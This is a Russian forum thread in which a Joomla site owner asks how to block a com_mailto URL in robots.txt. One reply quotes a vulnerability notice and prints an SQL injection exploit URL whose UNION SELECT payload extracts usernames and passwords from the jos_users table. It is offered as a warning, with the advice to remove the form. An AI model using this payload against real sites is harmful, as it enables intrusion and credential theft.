Помогите с робот.txt

muwa
На сайте с 16.03.2010
Offline
102
485

Сайт на джумле. Проггер, как сказал, при создании сайта закрыл все не нужные для индексации элементы. Сейчас в я.вебмастере сидит некий элемент, который занимает 40% от всей массы, подозреваю что он не нужен. Программист говорит что все хоккей. Элемент такой

index.php?option=com_mailto&tmpl=component&

Вредна ли эта штука и как ее закрыть от индексации?

Disallow: index.php?option=com_mailto&tmpl=component& или как-то по другому?

M
На сайте с 25.05.2009
Offline
11
#1
muwa:
Сайт на джумле. Проггер, как сказал, при создании сайта закрыл все не нужные для индексации элементы. Сейчас в я.вебмастере сидит некий элемент, который занимает 40% от всей массы, подозреваю что он не нужен. Программист говорит что все хоккей. Элемент такой
index.php?option=com_mailto&tmpl=component&

Вредна ли эта штука и как ее закрыть от индексации?

Disallow: index.php?option=com_mailto&tmpl=component& или как-то по другому?

Программа: Joomla Component MailTo

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «article» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

/index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1

/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+ concat(username,char(58),password)KHG+from+jos_users--&Itemid=1

Вот такая вот фигня существует, я бы снес эту форму.

muwa
На сайте с 16.03.2010
Offline
102
#2

Написал ему, спасибо 🚬

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий